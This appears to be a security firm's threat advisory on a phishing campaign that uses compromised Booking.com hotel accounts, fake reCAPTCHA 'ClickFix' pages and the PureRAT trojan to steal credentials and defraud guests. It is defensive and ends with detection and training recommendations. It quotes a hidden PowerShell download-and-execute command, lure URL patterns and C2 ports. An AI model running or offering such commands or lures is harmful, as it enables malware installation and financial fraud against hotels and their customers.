Sophisticated Phishing Campaign Targets Booking.com Hotels and Guests

Share:

This campaign targets hotel partners and guests using compromised Booking[.]com accounts. Threat actors launch phishing and malware campaigns through malicious emails and WhatsApp messages disguised with legitimate reservation information, increasing credibility. The end goal is to steal credentials, deploy malware (PureRAT), and commit financial fraud.

Severity: High

Threat Details

Phase 1: Initial Compromise of Hotel Systems

StepDescriptionMechanism
Initial LureAttack begins with a malicious email sent to a hotel’s reservation or administration address, often from another compromised legit corporate account. The email impersonates Booking.com and refers to a customer request, such as a “New last-minute booking”.Spear-phishing.
Redirection ChainThe email contains a URL (e.g., hxxps://{randomname}[.]com/[a-z0-9]{4}) that uses a Traffic Distribution System (TDS) for redirection, concealing the final malicious infrastructure.TDS infrastructure.
ClickFix TacticThe victim is directed to a page impersonating the Booking[.]com extranet/admin interface, which features a fake reCAPTCHA challenge. This is the ClickFix social engineering tactic.Social Engineering.
Malware ExecutionThe victim is prompted to copy and execute a disguised PowerShell command (e.g., powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command “lex ((New-Object Net.WebClient).Do wnloadString(‘…’))”).PowerShell abuse.
Final PayloadThe command downloads & executes a script that installs PureRAT, typically using DLL side-loading & persistence mechanisms (Runkeys, Startup folder shortcuts). The core goal is to steal credentials giving access to guest data.PureRAT (Remote Access Trojan).

Phase 2: Fraud Targeting Customers

AspectDetails
Fraudulent ContactCustomers are contacted directly via WhatsApp or email. The messages contain legitimate reservation details (personal identifiers and dates) from the stolen hotel data, significantly increasing credibility.
Phishing LureThe message falsely claims a security issue with the customer’s banking details during verification and urges them to “confirm their information” to prevent reservation cancellation, citing a fake “Booking new policy”.
Phishing PageThe victim is directed to a URL (e.g., https[:]//guestverifiy5313-booking[.]com/6712 2859). The page is protected by Cloudflare Turnstile but mimics the Booking[.]com layout to harvest banking information.
OutcomeThe customer is defrauded, effectively paying for the reservation a second time – the source of the campaign’s name, “I Paid Twice”.

Recommendations

  1. Train staff to recognize spear-phishing attempts that impersonate customer inquiries or official Booking[.]com messages.
    Specifically warn against clicking links or, most critically, copying and executing commands disguised as security checks (like the ClickFix reCAPTCHA tactic).
    Emphasize that legitimate platforms like Booking[.]com will never ask an administrator to execute a PowerShell script to view a reservation or a message.
  2. Mandate MFA for all professional accounts accessing booking platforms (Booking[.]com, Expedia, Airbnb, etc.)
  3. Treat any message (email or WhatsApp) claiming a payment issue with extreme caution, even if it contains legitimate reservation details.
  4. Never click a link in an unexpected message to “verify” or “update” banking information.
  5. Monitor for PowerShell scripts that download content from external URLs, particularly those using Invoke-WebRequest or Invoke-Expression.
  6. Monitor for TCP/TLS outbound connections on uncommon ports (56001–56003), used by PureRAT for encrypted C2 communications, and correlate with new process executions.
  7. Monitor for unusual creation of persistence mechanisms (Run registry keys and .lnk files in the Startup folder).
  8. Monitor for anomalous process execution chains, such as AddInProcess32.exe being launched by an executable in the AppData directory or initiating unexpected network connections.
  9. Block the IOCs at their respective controls
    https://www.virustotal.com/gui/collection/254adcf653d8f660740d1c40f264085a4f2b106e13d762ccb5a14e1c6737fbd6/iocs

Source:

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.